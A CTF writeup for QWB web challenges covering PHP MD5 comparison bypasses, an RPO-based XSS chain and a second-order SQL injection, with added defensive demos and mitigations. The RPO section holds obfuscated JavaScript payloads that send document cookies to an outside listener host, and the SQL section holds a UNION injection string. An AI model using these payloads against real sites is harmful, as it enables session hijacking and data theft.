QWB CTF (强网杯) web writeups

Solutions to a few of the web challenges.

Web sign-in (web签到)

The idea here is to work through a chain of PHP quirks one after another; the source is hidden in an HTML comment.
The final stage requires an actual MD5 collision.

```php
if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
    die("success!");
}
```

In a loose (`==`) comparison, PHP treats an MD5 hash that begins with `0e` as a number written in scientific notation, so two such hashes compare as equal (both are zero).
Both QNKCDZO and 240610708 have MD5 hashes that begin with `0e`.
The next stage simply turns the loose comparison into a strict one:

```php
if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("success!");
}
```

Because md5(array) returns NULL, we can submit two arrays: rename the parameters from param to param[].

```php
if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("success!");
}
```

This stage restricts the input type, so only a real MD5 collision will do.
The payload follows; the collision pair is taken from an MD5 collision reference (link).

```python
import requests
from binascii import unhexlify

# Stage 1: two strings whose MD5 hashes both start with 0e (loose comparison)
data1 = {
    'param1': 'QNKCDZO',
    'param2': '240610708'
}

# Stage 2: arrays, md5(array) is NULL on both sides (strict comparison)
data2 = {
    'param1[]': '1.0',
    'param2[]': '1'
}

# Stage 3: a genuine MD5 collision pair (hex strings joined from the reference)
data3 = {
    'param1': b'Oded Goldreich\nOded Goldreich\nOded Goldreich\nOded Go' +
              unhexlify('d8050d0019bb9318924caa96dce35cb835b349e144e98c50c22cf461244a4'
                        '064bf1afaecc5820d428ad38d6bec89a5ad51e29063dd79b16cf67c12978647f5af123de3acf844085cd025b956'),
    'param2': b'Neal Koblitz\nNeal Koblitz\nNeal Koblitz\nNeal Koblitz\n' +
              unhexlify('75b80e0035f3d2c909af1baddce35cb835b349e144e88c50c22cf461244a40e'
                        '4bf1afaecc5820d428ad38d6bec89a5ad51e29063dd79b16cf6fc11978647f5af123de3acf84408dcd025b956')
}

url = "http://39.107.33.96:10000/index.php"

# One session so the server-side stage counter is kept between requests
n = requests.session()
n.cookies.clear()
r = n.get(url)
r = n.post(url, data=data1)
r = n.get(url)
r = n.post(url, data=data2)
r = n.get(url)
r = n.post(url, data=data3)
print(r.text)
```

A gripe: the MD5 collision alone would also have passed the first two stages, so the first two checks feel rather pointless.

share your mind

This challenge calls for an RPO attack.

  • RPO (Relative Path Overwrite) is a newer attack technique first described by Gareth Heyes in an article of his. It exploits the gap between how browsers resolve relative paths and how some server configurations interpret the same URL; with a few tricks, a relative path can be made to pull in a different resource and achieve the attacker's goal.
    RPO attack reference (link)

index.php loads its JavaScript with a relative path,
`src="static/js/jquery.min.js"`, and the article pages are user-controlled, which is exactly the setup RPO needs. Write an article containing alert(1),
then request http://39.107.33.96:20000/index.php/view/article/2702/..%2f..%2f..%2f
The alert fires (screenshot).
Next, try to exfiltrate the cookie:

```javascript
str='window.open(\'http://182.254.221.239:8081/'+document.cookie+'\')';eval(str);
```

Angle brackets are filtered, which String.fromCharCode gets around:

```javascript
eval(String.fromCharCode(115,116,114,61,39,119,105,110,100,111,119,46,111,112,101,110,40,92,39,
104,116,116,112,58,47,47,49,56,50,46,50,53,52,46,50,50,49,46,50,51,57,58,56,48,56,49,47,39,43,
100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,39,92,39,41,39,59,101,118,97,108,40,115,116,114,41,59))
```

Submit http://39.107.33.96:20000/index.php/view/article/2739/..%2f..%2f..%2f
The server resolves this address to http://39.107.33.96:20000/index.php, while the browser resolves the script to http://39.107.33.96:20000/index.php/view/article/2739/static/js/jquery.min.js
The server resolves that in turn to http://39.107.33.96:20000/index.php/view/article/2739, returns the content of article 2739, and the browser executes it as JavaScript.
Listen on a port with nc on a server
and a hint comes back
(screenshot)
HINT=Try to get the cookie of path /QWB_fl4g/QWB/
An iframe pointed at that path can read the cookie directly:

```javascript
var i =document.createElement("iframe");
i.setAttribute("src","/QWB_fl4g/QWB/");document.body.appendChild(i);
i.addEventListener("load",function(){var content = i.contentWindow.document.cookie; location='//182.254.221.239:8081/'+btoa(content); },false);
```

This payload may be easier to follow:

```javascript
var i=document.createElement("iframe");
i.src="/QWB_fl4g/QWB/";
i.id="a";
document.body.appendChild(i);
i.onload = function (){
    var c=document.getElementById('a').contentWindow.document.cookie;
    // the trailing slash keeps the port number intact in the resulting URL
    location.href="http://182.254.221.239:8081/"+c;
}
```

Encoded with String.fromCharCode in the same way:

```javascript
eval(String.fromCharCode(118,97,114,32,105,32,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,
69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,32,105,46,115,101,116,65,116,116,114,105,
98,117,116,101,40,34,115,114,99,34,44,34,47,81,87,66,95,102,108,52,103,47,81,87,66,47,34,41,59,100,111,
99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,105,41,59,32,105,
46,97,100,100,69,118,101,110,116,76,105,115,116,101,110,101,114,40,34,108,111,97,100,34,44,102,117,110,99,
116,105,111,110,40,41,123,118,97,114,32,99,111,110,116,101,110,116,32,61,32,105,46,99,111,110,116,101,110,
116,87,105,110,100,111,119,46,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,32,108,111,99,97,
116,105,111,110,61,39,47,47,49,56,50,46,50,53,52,46,50,50,49,46,50,51,57,58,56,48,56,49,47,39,43,98,116,111,
97,40,99,111,110,116,101,110,116,41,59,32,125,44,102,97,108,115,101,41,59))
```

Submit http://39.107.33.96:20000/index.php/view/article/2740/..%2f..%2f..%2f
(screenshot)
Base64-decode the result: flag=QWB{flag_is_f43kth4rpo}
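The browser/server disagreement behind the 2739 request above, reproduced as an added example (not code from the challenge or the original post). `browser_resolve` is plain RFC 3986 reference resolution via `urllib.parse.urljoin`; `server_route` is an assumed, simplified model of a PHP front controller that treats everything after `/index.php` as PATH_INFO, decodes `%2f`, collapses `..` and ignores surplus segments, which is enough to reproduce the two resolutions the writeup describes. `uses_relative_script` is the audit check a defender would run over a template.

```python
import posixpath
from urllib.parse import unquote, urljoin

HOST = "http://39.107.33.96:20000"  # challenge host from the writeup
DOC = HOST + "/index.php/view/article/2739/..%2f..%2f..%2f"


def browser_resolve(document_url: str, src: str) -> str:
    """Turn a <script src=...> value into the URL the browser requests.
    An encoded '%2f' is not a path separator to the browser, so the whole
    '..%2f..%2f..%2f' tail is one segment and is simply dropped before
    'static/js/jquery.min.js' is appended."""
    return urljoin(document_url, src)


def server_route(request_path: str):
    """Assumed model of the server side: PATH_INFO after /index.php, with
    %2f decoded to '/', dot segments collapsed, and only the first three
    segments (controller/action/id) used. Anything not under /index.php is
    treated as a static file."""
    path = posixpath.normpath(unquote(request_path))
    prefix = "/index.php"
    if not path.startswith(prefix):
        return ("static", path)
    parts = [p for p in path[len(prefix):].split("/") if p]
    return tuple(parts[:3]) if parts else ("index",)


def uses_relative_script(src: str) -> bool:
    """Audit check: a src that is neither '/rooted' nor an absolute URL is
    resolved relative to whatever URL the page happened to be served under."""
    return not (src.startswith("/") or "://" in src)


def explain(document_url: str, src: str) -> dict:
    """Show where the page came from and what the script request turns into."""
    script_url = browser_resolve(document_url, src)
    return {
        "page_routed_to": server_route(document_url[len(HOST):]),
        "script_url": script_url,
        "script_routed_to": server_route(script_url[len(HOST):]),
        "relative": uses_relative_script(src),
    }


if __name__ == "__main__":
    # Vulnerable template: relative src, as on the challenge page
    for k, v in explain(DOC, "static/js/jquery.min.js").items():
        print(f"{k:18}: {v}")
    print()
    # Fixed template: rooted src, resolves the same way from any page URL
    for k, v in explain(DOC, "/static/js/jquery.min.js").items():
        print(f"{k:18}: {v}")
```

Two server-side mitigations follow from the model: emit rooted or absolute asset URLs so the document URL cannot influence where the script comes from, and send `X-Content-Type-Options: nosniff` with article pages served as `text/html`, since browsers then refuse to execute a non-JavaScript MIME type as a script even when the URL resolution is fooled. Rejecting requests whose PATH_INFO carries surplus segments removes the routing ambiguity as well.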

three hits

A simple second-order injection; note the use of LIMIT.

```sql
9999999 and 1 =2 union select 1,(select table_name from information_schema.tables where table_schema='qwb' limit 0,1),3,4--
```

(screenshot)
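What makes an injection "second-order", shown as an added example in Python with SQLite (not the challenge's code; the schema, the `secrets` table and the stored value are constructed for the demonstration). The first query is parameterised and stores the value untouched; the bug is in the second query, which trusts data read back from the database and concatenates it into SQL. The safe variant parameterises that second query too.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a users table plus a secrets table the
    score lookup was never meant to reach."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, score INTEGER);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO users (name, score) VALUES ('alice', 10), ('bob', 20);
        INSERT INTO secrets (flag) VALUES ('FLAG{constructed-sample}');
    """)
    return db


def register(db: sqlite3.Connection, name: str) -> int:
    """First-order step: parameterised, so any name is stored verbatim and
    nothing goes wrong here. The value is now 'trusted' database content."""
    cur = db.execute("INSERT INTO users (name, score) VALUES (?, 0)", (name,))
    return cur.lastrowid


def scores_vulnerable(db: sqlite3.Connection, user_id: int):
    """Second-order step, vulnerable: the stored name is read back and
    formatted straight into the next query."""
    name = db.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    sql = f"SELECT name, score FROM users WHERE name = '{name}'"
    return db.execute(sql).fetchall()


def scores_safe(db: sqlite3.Connection, user_id: int):
    """Same lookup, fixed: data coming out of the database is bound as a
    parameter exactly like data coming from the request."""
    name = db.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()[0]
    return db.execute("SELECT name, score FROM users WHERE name = ?", (name,)).fetchall()


# Constructed stored value in the same UNION ... LIMIT shape as the writeup's
# payload; the LIMIT makes the leaked row deterministic.
STORED = "x' UNION SELECT flag, 1 FROM secrets LIMIT 1 --"


def demo():
    db = make_db()
    uid = register(db, STORED)
    return scores_vulnerable(db, uid), scores_safe(db, uid)


if __name__ == "__main__":
    leaked, clean = demo()
    print("vulnerable lookup:", leaked)
    print("safe lookup      :", clean)
```

The detection angle is the same as for first-order injection, with one difference worth remembering when reviewing code: grep for string formatting into SQL everywhere, not only where request parameters are handled, because the tainted value may arrive from a SELECT several requests later.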